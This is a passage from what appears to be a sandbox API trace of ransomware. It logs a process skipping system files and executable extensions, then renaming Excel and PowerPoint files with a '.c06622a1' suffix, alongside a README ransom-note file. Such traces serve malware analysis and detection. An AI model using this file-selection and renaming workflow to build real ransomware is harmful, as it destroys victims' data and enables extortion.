returned 0x3 [0156.838] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0156.838] wcslen (_String="msstyles") returned 0x8 [0156.838] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0156.838] wcslen (_String="msu") returned 0x3 [0156.838] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0156.838] wcslen (_String="nls") returned 0x3 [0156.838] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0156.838] wcslen (_String="nomedia") returned 0x7 [0156.838] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0156.838] wcslen (_String="ocx") returned 0x3 [0156.838] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0156.838] wcslen (_String="prf") returned 0x3 [0156.838] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0156.838] wcslen (_String="ps1") returned 0x3 [0156.838] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0156.838] wcslen (_String="rom") returned 0x3 [0156.838] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0156.838] wcslen (_String="rtp") returned 0x3 [0156.839] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0156.839] wcslen (_String="scr") returned 0x3 [0156.839] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0156.839] wcslen (_String="shs") returned 0x3 [0156.839] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0156.839] wcslen (_String="spl") returned 0x3 [0156.839] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0156.839] wcslen (_String="sys") returned 0x3 [0156.839] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0156.839] wcslen (_String="theme") returned 0x5 [0156.839] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0156.839] wcslen (_String="themepack") returned 0x9 [0156.839] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0156.839] wcslen (_String="wpx") returned 0x3 [0156.839] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0156.839] wcslen (_String="lock") returned 0x4 [0156.839] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0156.839] wcslen (_String="key") returned 0x3 [0156.839] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0156.839] wcslen (_String="hta") returned 0x3 [0156.839] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0156.839] wcslen (_String="msi") returned 0x3 [0156.839] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0156.839] wcslen (_String="pdb") returned 0x3 [0156.839] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0156.839] wcslen (_String="sqlite") returned 0x6 [0156.840] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix")) returned 0x10 [0156.840] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.840] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" [0156.840] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned 0x34 [0156.840] wcscpy (in: _Dest=0x32400ca, _Source="O7sfdfa6z7SFDc0lS.xlsx" | out: _Dest="O7sfdfa6z7SFDc0lS.xlsx") returned="O7sfdfa6z7SFDc0lS.xlsx" [0156.840] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\O7sfdfa6z7SFDc0lS.xlsx", dwFileAttributes=0x80) returned 1 [0156.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\O7sfdfa6z7SFDc0lS.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\o7sfdfa6z7sfdc0ls.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0156.840] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.840] ReadFile (in: hFile=0x1d8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.841] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x81517594 [0156.841] RtlComputeCrc32 (PartialCrc=0x7594, Buffer=0x32e9a4, Length=0x80) returned 0xd09659cd [0156.841] RtlComputeCrc32 (PartialCrc=0x59cd, Buffer=0x32e9a4, Length=0x80) returned 0xfe228e4a [0156.841] RtlComputeCrc32 (PartialCrc=0x8e4a, Buffer=0x32e9a4, Length=0x80) returned 0x51554b6b [0156.841] RtlComputeCrc32 (PartialCrc=0x4b6b, Buffer=0x32e9a4, Length=0x80) returned 0xbf519f03 [0156.841] CloseHandle (hObject=0x1d8) returned 1 [0156.841] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.841] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\O7sfdfa6z7SFDc0lS.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\O7sfdfa6z7SFDc0lS.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\O7sfdfa6z7SFDc0lS.xlsx" [0156.841] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\O7sfdfa6z7SFDc0lS.xlsx") returned 0x4b [0156.841] wcscpy (in: _Dest=0x32500fe, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.841] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\O7sfdfa6z7SFDc0lS.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\o7sfdfa6z7sfdc0ls.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\O7sfdfa6z7SFDc0lS.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\o7sfdfa6z7sfdc0ls.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0156.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\O7sfdfa6z7SFDc0lS.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\o7sfdfa6z7sfdc0ls.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d8 [0156.844] CreateIoCompletionPort (FileHandle=0x1d8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.844] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x36c0020 [0156.854] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6765f4e0 [0156.855] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2f0deabf [0156.855] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x18a3f41f [0156.855] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x612e9415 [0156.855] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6a8728d7 [0156.855] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f1da977 [0156.855] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5d09f081 [0156.855] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4089f00d [0156.858] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x36c0094, Length=0x80) returned 0x258df473 [0156.858] RtlComputeCrc32 (PartialCrc=0xf473, Buffer=0x36c0094, Length=0x80) returned 0x30a48899 [0156.858] RtlComputeCrc32 (PartialCrc=0x8899, Buffer=0x36c0094, Length=0x80) returned 0xd514ec8d [0156.858] RtlComputeCrc32 (PartialCrc=0xec8d, Buffer=0x36c0094, Length=0x80) returned 0x4807ca2 [0156.858] RtlComputeCrc32 (PartialCrc=0x7ca2, Buffer=0x36c0094, Length=0x80) returned 0x6f8a5002 [0156.858] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0156.858] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.858] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.858] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a99f60, ftCreationTime.dwHighDateTime=0x1d5e438, ftLastAccessTime.dwLowDateTime=0xa3c5f9f0, ftLastAccessTime.dwHighDateTime=0x1d5d7de, ftLastWriteTime.dwLowDateTime=0xa3c5f9f0, ftLastWriteTime.dwHighDateTime=0x1d5d7de, nFileSizeHigh=0x0, nFileSizeLow=0x18889, dwReserved0=0x0, dwReserved1=0x0, cFileName="oemmUE94iN-oqAQuFaf.ppt", cAlternateFileName="OEMMUE~1.PPT")) returned 1 [0156.858] _wcsicmp (_Str1="oemmUE94iN-oqAQuFaf.ppt", _Str2="README.c06622a1.TXT") returned -3 [0156.858] wcsstr (_Str="oemmUE94iN-oqAQuFaf.ppt", _SubStr="README") returned 0x0 [0156.858] _wcsicmp (_Str1="autorun.inf", _Str2="oemmUE94iN-oqAQuFaf.ppt") returned -14 [0156.858] wcslen (_String="autorun.inf") returned 0xb [0156.859] _wcsicmp (_Str1="boot.ini", _Str2="oemmUE94iN-oqAQuFaf.ppt") returned -13 [0156.859] wcslen (_String="boot.ini") returned 0x8 [0156.859] _wcsicmp (_Str1="bootfont.bin", _Str2="oemmUE94iN-oqAQuFaf.ppt") returned -13 [0156.859] wcslen (_String="bootfont.bin") returned 0xc [0156.859] _wcsicmp (_Str1="bootsect.bak", _Str2="oemmUE94iN-oqAQuFaf.ppt") returned -13 [0156.859] wcslen (_String="bootsect.bak") returned 0xc [0156.859] _wcsicmp (_Str1="desktop.ini", _Str2="oemmUE94iN-oqAQuFaf.ppt") returned -11 [0156.859] wcslen (_String="desktop.ini") returned 0xb [0156.859] _wcsicmp (_Str1="iconcache.db", _Str2="oemmUE94iN-oqAQuFaf.ppt") returned -6 [0156.859] wcslen (_String="iconcache.db") returned 0xc [0156.859] _wcsicmp (_Str1="ntldr", _Str2="oemmUE94iN-oqAQuFaf.ppt") returned -1 [0156.859] wcslen (_String="ntldr") returned 0x5 [0156.859] _wcsicmp (_Str1="ntuser.dat", _Str2="oemmUE94iN-oqAQuFaf.ppt") returned -1 [0156.859] wcslen (_String="ntuser.dat") returned 0xa [0156.859] _wcsicmp (_Str1="ntuser.dat.log", _Str2="oemmUE94iN-oqAQuFaf.ppt") returned -1 [0156.859] wcslen (_String="ntuser.dat.log") returned 0xe [0156.859] _wcsicmp (_Str1="ntuser.ini", _Str2="oemmUE94iN-oqAQuFaf.ppt") returned -1 [0156.859] wcslen (_String="ntuser.ini") returned 0xa [0156.859] _wcsicmp (_Str1="thumbs.db", _Str2="oemmUE94iN-oqAQuFaf.ppt") returned 5 [0156.859] wcslen (_String="thumbs.db") returned 0x9 [0156.859] _wcsicmp (_Str1="386", _Str2="ppt") returned -61 [0156.860] wcslen (_String="386") returned 0x3 [0156.860] _wcsicmp (_Str1="adv", _Str2="ppt") returned -15 [0156.860] wcslen (_String="adv") returned 0x3 [0156.860] _wcsicmp (_Str1="ani", _Str2="ppt") returned -15 [0156.860] wcslen (_String="ani") returned 0x3 [0156.860] _wcsicmp (_Str1="bat", _Str2="ppt") returned -14 [0156.860] wcslen (_String="bat") returned 0x3 [0156.860] _wcsicmp (_Str1="bin", _Str2="ppt") returned -14 [0156.860] wcslen (_String="bin") returned 0x3 [0156.860] _wcsicmp (_Str1="cab", _Str2="ppt") returned -13 [0156.860] wcslen (_String="cab") returned 0x3 [0156.860] _wcsicmp (_Str1="cmd", _Str2="ppt") returned -13 [0156.860] wcslen (_String="cmd") returned 0x3 [0156.860] _wcsicmp (_Str1="com", _Str2="ppt") returned -13 [0156.860] wcslen (_String="com") returned 0x3 [0156.860] _wcsicmp (_Str1="cpl", _Str2="ppt") returned -13 [0156.860] wcslen (_String="cpl") returned 0x3 [0156.860] _wcsicmp (_Str1="cur", _Str2="ppt") returned -13 [0156.860] wcslen (_String="cur") returned 0x3 [0156.860] _wcsicmp (_Str1="deskthemepack", _Str2="ppt") returned -12 [0156.860] wcslen (_String="deskthemepack") returned 0xd [0156.860] _wcsicmp (_Str1="diagcab", _Str2="ppt") returned -12 [0156.860] wcslen (_String="diagcab") returned 0x7 [0156.860] _wcsicmp (_Str1="diagcfg", _Str2="ppt") returned -12 [0156.861] wcslen (_String="diagcfg") returned 0x7 [0156.861] _wcsicmp (_Str1="diagpkg", _Str2="ppt") returned -12 [0156.861] wcslen (_String="diagpkg") returned 0x7 [0156.861] _wcsicmp (_Str1="dll", _Str2="ppt") returned -12 [0156.861] wcslen (_String="dll") returned 0x3 [0156.861] _wcsicmp (_Str1="drv", _Str2="ppt") returned -12 [0156.861] wcslen (_String="drv") returned 0x3 [0156.861] _wcsicmp (_Str1="exe", _Str2="ppt") returned -11 [0156.861] wcslen (_String="exe") returned 0x3 [0156.861] _wcsicmp (_Str1="hlp", _Str2="ppt") returned -8 [0156.861] wcslen (_String="hlp") returned 0x3 [0156.861] _wcsicmp (_Str1="icl", _Str2="ppt") returned -7 [0156.861] wcslen (_String="icl") returned 0x3 [0156.861] _wcsicmp (_Str1="icns", _Str2="ppt") returned -7 [0156.861] wcslen (_String="icns") returned 0x4 [0156.861] _wcsicmp (_Str1="ico", _Str2="ppt") returned -7 [0156.861] wcslen (_String="ico") returned 0x3 [0156.861] _wcsicmp (_Str1="ics", _Str2="ppt") returned -7 [0156.861] wcslen (_String="ics") returned 0x3 [0156.861] _wcsicmp (_Str1="idx", _Str2="ppt") returned -7 [0156.861] wcslen (_String="idx") returned 0x3 [0156.861] _wcsicmp (_Str1="ldf", _Str2="ppt") returned -4 [0156.861] wcslen (_String="ldf") returned 0x3 [0156.861] _wcsicmp (_Str1="lnk", _Str2="ppt") returned -4 [0156.862] wcslen (_String="lnk") returned 0x3 [0156.862] _wcsicmp (_Str1="mod", _Str2="ppt") returned -3 [0156.862] wcslen (_String="mod") returned 0x3 [0156.862] _wcsicmp (_Str1="mpa", _Str2="ppt") returned -3 [0156.862] wcslen (_String="mpa") returned 0x3 [0156.862] _wcsicmp (_Str1="msc", _Str2="ppt") returned -3 [0156.862] wcslen (_String="msc") returned 0x3 [0156.862] _wcsicmp (_Str1="msp", _Str2="ppt") returned -3 [0156.862] wcslen (_String="msp") returned 0x3 [0156.862] _wcsicmp (_Str1="msstyles", _Str2="ppt") returned -3 [0156.862] wcslen (_String="msstyles") returned 0x8 [0156.862] _wcsicmp (_Str1="msu", _Str2="ppt") returned -3 [0156.862] wcslen (_String="msu") returned 0x3 [0156.862] _wcsicmp (_Str1="nls", _Str2="ppt") returned -2 [0156.862] wcslen (_String="nls") returned 0x3 [0156.862] _wcsicmp (_Str1="nomedia", _Str2="ppt") returned -2 [0156.862] wcslen (_String="nomedia") returned 0x7 [0156.862] _wcsicmp (_Str1="ocx", _Str2="ppt") returned -1 [0156.862] wcslen (_String="ocx") returned 0x3 [0156.863] _wcsicmp (_Str1="prf", _Str2="ppt") returned 2 [0156.863] wcslen (_String="prf") returned 0x3 [0156.863] _wcsicmp (_Str1="ps1", _Str2="ppt") returned 3 [0156.863] wcslen (_String="ps1") returned 0x3 [0156.863] _wcsicmp (_Str1="rom", _Str2="ppt") returned 2 [0156.863] wcslen (_String="rom") returned 0x3 [0156.863] _wcsicmp (_Str1="rtp", _Str2="ppt") returned 2 [0156.863] wcslen (_String="rtp") returned 0x3 [0156.863] _wcsicmp (_Str1="scr", _Str2="ppt") returned 3 [0156.863] wcslen (_String="scr") returned 0x3 [0156.863] _wcsicmp (_Str1="shs", _Str2="ppt") returned 3 [0156.863] wcslen (_String="shs") returned 0x3 [0156.863] _wcsicmp (_Str1="spl", _Str2="ppt") returned 3 [0156.863] wcslen (_String="spl") returned 0x3 [0156.863] _wcsicmp (_Str1="sys", _Str2="ppt") returned 3 [0156.863] wcslen (_String="sys") returned 0x3 [0156.863] _wcsicmp (_Str1="theme", _Str2="ppt") returned 4 [0156.863] wcslen (_String="theme") returned 0x5 [0156.863] _wcsicmp (_Str1="themepack", _Str2="ppt") returned 4 [0156.863] wcslen (_String="themepack") returned 0x9 [0156.863] _wcsicmp (_Str1="wpx", _Str2="ppt") returned 7 [0156.863] wcslen (_String="wpx") returned 0x3 [0156.863] _wcsicmp (_Str1="lock", _Str2="ppt") returned -4 [0156.863] wcslen (_String="lock") returned 0x4 [0156.864] _wcsicmp (_Str1="key", _Str2="ppt") returned -5 [0156.864] wcslen (_String="key") returned 0x3 [0156.864] _wcsicmp (_Str1="hta", _Str2="ppt") returned -8 [0156.864] wcslen (_String="hta") returned 0x3 [0156.864] _wcsicmp (_Str1="msi", _Str2="ppt") returned -3 [0156.864] wcslen (_String="msi") returned 0x3 [0156.864] _wcsicmp (_Str1="pdb", _Str2="ppt") returned -12 [0156.864] wcslen (_String="pdb") returned 0x3 [0156.864] _wcsicmp (_Str1="sqlite", _Str2="ppt") returned 3 [0156.864] wcslen (_String="sqlite") returned 0x6 [0156.864] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix")) returned 0x10 [0156.864] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.864] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" [0156.864] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned 0x34 [0156.864] wcscpy (in: _Dest=0x32400ca, _Source="oemmUE94iN-oqAQuFaf.ppt" | out: _Dest="oemmUE94iN-oqAQuFaf.ppt") returned="oemmUE94iN-oqAQuFaf.ppt" [0156.864] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\oemmUE94iN-oqAQuFaf.ppt", dwFileAttributes=0x80) returned 1 [0156.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\oemmUE94iN-oqAQuFaf.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\oemmue94in-oqaqufaf.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0156.865] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.865] ReadFile (in: hFile=0x1c8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.866] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x30198e52 [0156.866] RtlComputeCrc32 (PartialCrc=0x8e52, Buffer=0x32e9a4, Length=0x80) returned 0xd69baedc [0156.866] RtlComputeCrc32 (PartialCrc=0xaedc, Buffer=0x32e9a4, Length=0x80) returned 0x33f95205 [0156.866] RtlComputeCrc32 (PartialCrc=0x5205, Buffer=0x32e9a4, Length=0x80) returned 0x4d4aadcc [0156.866] RtlComputeCrc32 (PartialCrc=0xadcc, Buffer=0x32e9a4, Length=0x80) returned 0xe0533522 [0156.866] CloseHandle (hObject=0x1c8) returned 1 [0156.866] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.866] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\oemmUE94iN-oqAQuFaf.ppt" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\oemmUE94iN-oqAQuFaf.ppt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\oemmUE94iN-oqAQuFaf.ppt" [0156.866] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\oemmUE94iN-oqAQuFaf.ppt") returned 0x4c [0156.866] wcscpy (in: _Dest=0x3250100, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.866] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\oemmUE94iN-oqAQuFaf.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\oemmue94in-oqaqufaf.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\oemmUE94iN-oqAQuFaf.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\oemmue94in-oqaqufaf.ppt.c06622a1"), dwFlags=0x8) returned 1 [0156.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\oemmUE94iN-oqAQuFaf.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\oemmue94in-oqaqufaf.ppt.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c8 [0156.869] CreateIoCompletionPort (FileHandle=0x1c8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.869] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3750020 [0156.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1042d1e [0156.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x65c0b706 [0156.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x15e97c5f [0156.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4546a03c [0156.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x754d16a4 [0156.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x51763654 [0156.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7a417261 [0156.877] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2ab5e916 [0156.880] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3750094, Length=0x80) returned 0x1c7cc512 [0156.880] RtlComputeCrc32 (PartialCrc=0xc512, Buffer=0x3750094, Length=0x80) returned 0xb42fa81c [0156.880] RtlComputeCrc32 (PartialCrc=0xa81c, Buffer=0x3750094, Length=0x80) returned 0xc7ec4755 [0156.880] RtlComputeCrc32 (PartialCrc=0x4755, Buffer=0x3750094, Length=0x80) returned 0x69258549 [0156.880] RtlComputeCrc32 (PartialCrc=0x8549, Buffer=0x3750094, Length=0x80) returned 0x2c5da9c0 [0156.880] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0156.880] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.880] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.880] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b237c40, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8b237c40, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8b237c40, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.880] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.880] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07b330, ftCreationTime.dwHighDateTime=0x1d5dba3, ftLastAccessTime.dwLowDateTime=0xa5957350, ftLastAccessTime.dwHighDateTime=0x1d5e3d2, ftLastWriteTime.dwLowDateTime=0xa5957350, ftLastWriteTime.dwHighDateTime=0x1d5e3d2, nFileSizeHigh=0x0, nFileSizeLow=0x14858, dwReserved0=0x0, dwReserved1=0x0, cFileName="UnXbhzP45298tM0kFv.wav", cAlternateFileName="UNXBHZ~1.WAV")) returned 1 [0156.880] _wcsicmp (_Str1="UnXbhzP45298tM0kFv.wav", _Str2="README.c06622a1.TXT") returned 3 [0156.880] wcsstr (_Str="UnXbhzP45298tM0kFv.wav", _SubStr="README") returned 0x0 [0156.881] _wcsicmp (_Str1="autorun.inf", _Str2="UnXbhzP45298tM0kFv.wav") returned -20 [0156.881] wcslen (_String="autorun.inf") returned 0xb [0156.881] _wcsicmp (_Str1="boot.ini", _Str2="UnXbhzP45298tM0kFv.wav") returned -19 [0156.881] wcslen (_String="boot.ini") returned 0x8 [0156.881] _wcsicmp (_Str1="bootfont.bin", _Str2="UnXbhzP45298tM0kFv.wav") returned -19 [0156.881] wcslen (_String="bootfont.bin") returned 0xc [0156.881] _wcsicmp (_Str1="bootsect.bak", _Str2="UnXbhzP45298tM0kFv.wav") returned -19 [0156.881] wcslen (_String="bootsect.bak") returned 0xc [0156.881] _wcsicmp (_Str1="desktop.ini", _Str2="UnXbhzP45298tM0kFv.wav") returned -17 [0156.881] wcslen (_String="desktop.ini") returned 0xb [0156.881] _wcsicmp (_Str1="iconcache.db", _Str2="UnXbhzP45298tM0kFv.wav") returned -12 [0156.881] wcslen (_String="iconcache.db") returned 0xc [0156.881] _wcsicmp (_Str1="ntldr", _Str2="UnXbhzP45298tM0kFv.wav") returned -7 [0156.881] wcslen (_String="ntldr") returned 0x5 [0156.881] _wcsicmp (_Str1="ntuser.dat", _Str2="UnXbhzP45298tM0kFv.wav") returned -7 [0156.881] wcslen (_String="ntuser.dat") returned 0xa [0156.881] _wcsicmp (_Str1="ntuser.dat.log", _Str2="UnXbhzP45298tM0kFv.wav") returned -7 [0156.881] wcslen (_String="ntuser.dat.log") returned 0xe [0156.881] _wcsicmp (_Str1="ntuser.ini", _Str2="UnXbhzP45298tM0kFv.wav") returned -7 [0156.881] wcslen (_String="ntuser.ini") returned 0xa [0156.881] _wcsicmp (_Str1="thumbs.db", _Str2="UnXbhzP45298tM0kFv.wav") returned -1 [0156.881] wcslen (_String="thumbs.db") returned 0x9 [0156.881] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0156.881] wcslen (_String="386") returned 